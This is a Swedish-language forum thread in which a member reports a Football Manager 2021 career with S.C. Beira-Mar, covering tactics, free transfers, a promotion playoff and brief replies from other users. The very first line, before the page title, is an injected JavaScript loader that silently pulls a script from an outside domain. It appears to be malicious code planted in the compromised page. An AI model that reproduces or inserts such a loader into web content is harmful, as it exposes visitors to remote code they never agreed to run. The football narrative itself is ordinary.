;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); [FM21] Den Portugisiska Drömmen – S.C. Beira Mar – Avslutade rapporter – FMSweden Forum
Meny Stäng

Share:
Notifications
Clear all

[FM21] Den Portugisiska Drömmen - S.C. Beira Mar

12 Inlägg
3 Users
18 Reactions
714 Visningar
Billinator
(@billinator)
Active Member
Blev medlem: 3 år sedan
Inlägg: 9
Topic starter  

                                                                                                                        

Parabéns a Eusébio, o antigo jogador do Benfica, Beira-Mar e União de Tomar  – AventarSport Clube Beira-Mar.png

 

 

S.C. Beira Mar är en klubb lokaliserad i Aveiro, Portugal. Just nu är klubben i den portugisiska tredjeligan efter att ha blivit uppflyttade från fjärdedivisionen 2018-19. Klubben har lite historia, men inte så mycket då det enda dom har vunnit var den Portugisiska Cupen säsongen 1998-99. Detta var dock en ganska stor bedrift då de blev degraderade samma år. Det enda förutom det som supportrarna kan jubla över är faktumet att legenden Eusebio spenderade ett år där 1976. 

Jag bestämde mig för att göra denna save då jag blev inspirerad av Zealands save med Oriental Dragons och mitt mål är att ta tillbaka Beira Mar till högsta ligan och även vinna den.

 

Min plan är att uppdatera varje halvsäsong till att börja med men att sedan uppdatera efter varje säsong.

 

Hoppas ni finner detta intressant och följer denna save!

 


   
rockystar and Micke reacted
Citera
Vilmer1238
(@vilmer1238)
Active Member
Blev medlem: 3 år sedan
Inlägg: 9
 

Mycket intressant save! Ska bli kul å följa


   
SvaraCitera
Billinator
(@billinator)
Active Member
Blev medlem: 3 år sedan
Inlägg: 9
Topic starter  

Försäsongen 2020

 

S.C. Beira-Mar - Wikipedia

 

Den första försäsongen handlade mest om att lära känna laget och bestämma taktik samt "startelva". Inte för att jag kommer spela med samma lag hela tiden, men jag kommer att utgå ifrån en förstaelva. 

 

Taktiken

När jag skrev på för klubben sa styrelsen att vi skulle försöka spela possession-fotboll, så med det i åtanke och efter att ha bedömt vilka sorts spelare vi har bestämde jag mig för att gå med en egen variant av "tiki-taka". Inte lika lågt tempo och lite rakare med utom det är det ganska likt den tiki-taka fotboll vi alla känner till och älskar. Den spelare som stod ut mest för mig var högerytten Diego Raposo, en 23 årig brasiliansk ytter med otrolig potential och som även redan nu är en av våra stjärnspelare. En till spelare som såg intressant ut var vänsteryttern Ze Pedro från Portugal, han är även som Raposo, endast 23 år gammal och vänsterfotad. Värt att tillägga är även att en av våra anfallare Marko Mitrovic, är svensk och har tidigare spelat i Malmö FF.

 

Övergångarna

Eftersom att vi i spelet befinner oss i 2020 är det fullt med corona mm. Detta ledde till att vi inte hade så mycket pengar vilket att vi la det mesta på att förnya de kontrakt vi ville förnya. Iom allt detta betalade vi inga övergångssummor utan drog bara in spelare gratis. 

 

In:

Helder Balde: MB (Klubblös)

Maktom: MF (Klubblös)

Ronald: MB (Corinthians, 0kr)

Braima Fati: MF/YT (Klubblös)

 

Ut:

Ingen

 

Säsongsinledningen

Än så länge har säsongen gått som en dans på rosor, nästan fläckfritt. Efter att ha vunnit våra tre första matcher komfortabelt fick vi inte med oss mer än 0-0 mot Canelas 2010. En sak som har vi kan vara extra nöjda över är att vi har haft över 60% bollinehav i tre av våra fyra första matcher i ligan denna säsong. Den match vi inte hade det? Krysset mot Canelas. I cupen gick det dessvärre sämre då vi åkte ut i första omgången, det var dock mot ett Chaves som hade vunnit sina fem inledande matcher i den portugisiska andraligan. Efter de fyra första omgångarna leder vi ligan med 1 poäng.

 

This post was modified 3 år sedan 4 times by Billinator

   
raca14 reacted
SvaraCitera
Vilmer1238
(@vilmer1238)
Active Member
Blev medlem: 3 år sedan
Inlägg: 9
 

Älskar berättandet och hur du skriver! Fin rapport!


   
SvaraCitera
Billinator
(@billinator)
Active Member
Blev medlem: 3 år sedan
Inlägg: 9
Topic starter  

@vilmer1238 tack! ? 


   
SvaraCitera
Billinator
(@billinator)
Active Member
Blev medlem: 3 år sedan
Inlägg: 9
Topic starter  

S.C. Beira-Mar - Wikipedia

Höstsäsongen 2020

 

Efter den starka ineldingen på säsongen åkte vi på en stor formsvacka. Efter 0-0 krysset mot Canelas 2010 åkte vi på fyra raka matcher utan vinst inklusive en 0-2 förlust mot serieledande Lusitânia. Detta toppades av med ännu ett kryss borta mot S. Joao Ver. Sedan var det dags för en hemmamatch mot serietvåan Valadares Gaia och efter en trög start pangade stjärnskottet Diego Raposo in 1-0 målet i den 19 minuten. Efter det backade vi hem och lyckades ta våra första tre pinnar på över två månader. 

Efter den lättande vinsten har vi börjat hitta vår form igen och har nu skrapat ihop tre raka vinster på efter det. Efter 12 matcher spelade ligger vi på en tredjeplats med endast tre poäng bakom ettan. 

 

 

Övergångarna

Efter försäsongen gjorde vi inga värvningar pga den smala budgeten som vi har. Däremot drog vi in fyra spelare via pre-contract samt sålde den 26 åriga mittbacken Romario till Olhanense då han tjänade alldeles för mycket jämfört med hans roll i laget. Värt att tillägga är att Didi som vi värvade på pre-contract, leder skytteligan för vår serie med 10 fullträffar på 11 matcher.

 

In:

Fabricio: MV (Operario, pre-contract)

Nuno Namora: VB (Rio Ave, pre-contract)

Bruno Pelegrini: FWD (Braga, pre-contract)

Didi: FWD (Vizela, pre-contract)

 

Ut:

Romario: MB (Olhanense, 7,25t kr)

 

 

 

 

 

 

This post was modified 3 år sedan 4 times by Billinator

   
raca14 and Vilmer1238 reacted
SvaraCitera
Billinator
(@billinator)
Active Member
Blev medlem: 3 år sedan
Inlägg: 9
Topic starter  

S.C. Beira-Mar - Wikipedia

Vårsäsongen 2020

Den andra halvan av säsongen var jämnare och överlag bättre än den första. Efter att ha hittat vår form igen blandades bra insatser med sämre men vi lyckades ändå gå segrandes ur majoriteten av våra matcher. Många av våra mål kom ifrån fasta situationer vilket visas väldigt tydligt då våra mittbackar totalt gjorde 12 mål, alla från frispark eller hörna. Efter att ha kämpat ända in i kaklet lyckades vi inte komma högre upp än en tredjeplacering och fick nöja oss med playoff-gruppspel för den nybildande tredjeligan. 

I den första matchen i playoffet fick vi möta de som varit våra mardrömsmotståndare i ligan: Lusitânia. Vi hade förlorat med 6-1 totalt mot de och vi visste på förhand att det skulle bli en tuff uppgift. Vi lyckades dock göra en supermatch och vann med 2-0. Detta följdes upp med en förlust mot Salgueiros och ett kryss mot Trofense. Sedan var det dags för Lusitânia igen, där gjorde vi en betydligt sämre match än den första men lyckades ändå vinna med 2-1. Efter det fick vi endast med oss ett svagt kryss mot Salgueiros och efter det hängde allt på den sista matchen, vinst mot Trofense och vi når uppflyttning, allt annat och vi blir kvar i vad som kommer bli fjärdeligan. 

Vi inledde matchen ganska försiktigt med ambitionen att inte åka på ett tidigt baklängesmål och efter 28 minuter kom ledningsmålet. Vänsterbacken Mario Mendonca sköt en frispark i ribban och vår unga anfallare Diogo Tavares var först på returen och kunde enkelt peta in bollen i nät. Dock fick vi inte hålla ledningen länge då vi fick en tveksam straff emot oss som de enkelt satte i mål. Resten av matchen dominerades av oss och matchen gick mot sitt slut. Men i den 78 minuten tog sig Ze Pedro fram på vänsterkanten och rivdes ner i straffområdet. Domaren dömde straff och hela publiken stod på tå. Diogo Tavares var säkerheten själv när han placerade straffen i krysset och vår ledning var återigen ett faktum. Vi lyckades hålla ut och kunde fira uppflytttningen.

 

Spelarna

Årets spelare - Mario Mendonca:VB (7,49)

Årets unga spelare - Helder Balde: MB (7,20)

Årets Värvning - Helder Balde: MB (7,20)

Årets Skyttekung - Diego Raposo: HY/Diogo Tavares: FWD (10)

Årets Framspelare - Mario Mendonca: VB (11)

 

Förutom dessa spelare gjorde även Maktom, Ronald, Ibrahima Sory och Ivo Lemos en väldigt bra säsong samtidigt som Ze Pedro och Marko Mitrovic dessvärre inte var lika bra. Detta är också en anledning till att den sistnämnde inte fick ett nytt kontrakt och lämnade, samtidigt som vi också har väldigt dåligt med pengar.

 

Ungdomsintaget

Årets ungdomsintag var överlag väldigt bra med flera intressanta spelare. Vi beslutade oss för att ge alla kontrakt då de flesta var ungdomskontrakt och då kändes det värt besväret. De mest framträdande spelarna var Ricardo Farinha (FWD), Jose Moura (MV) och Paulo Vitor (MB/DM/MF).

 

 

Överlag skulle jag säga att det var en lyckad säsong med många känslor inblandade. En till sak att lyfta fram är att vårt U19 lag gick som tåget och blev uppflyttade samt att vi nu har fått en B-lag.

 

 

 

 

This post was modified 3 år sedan by Billinator

   
SvaraCitera
Vilmer1238
(@vilmer1238)
Active Member
Blev medlem: 3 år sedan
Inlägg: 9
 

Grattis till uppflyttningen??


   
Billinator reacted
SvaraCitera
Phansell
(@phansell)
Trusted Member
Blev medlem: 4 år sedan
Inlägg: 67
 

Jag kör själv med Lusitânia. Riktigt skojigt än så länge. Intressant system i tredje divisionen. 

"Say it loud, say it clear, refugees are welcome here!"
- FC St Pauli


   
SvaraCitera
Billinator
(@billinator)
Active Member
Blev medlem: 3 år sedan
Inlägg: 9
Topic starter  

@phansell Vad roligt att höra! Håller helt med, blir bara lite förvirrande ibland men det är en riktigt rolig liga!


   
Phansell reacted
SvaraCitera
Phansell
(@phansell)
Trusted Member
Blev medlem: 4 år sedan
Inlägg: 67
 

@billinator Hahah, ja i början när jag tittade igenom hur det funkade fattade jag inte. Sen blev det mer, jag gör så gott jag kan sen får vi se vart det leder.

"Say it loud, say it clear, refugees are welcome here!"
- FC St Pauli


   
Billinator reacted
SvaraCitera
Billinator
(@billinator)
Active Member
Blev medlem: 3 år sedan
Inlägg: 9
Topic starter  

@phansell ja precis! Efter första säsongen blir ju allt mycket simplare


   
Phansell reacted
SvaraCitera
Share: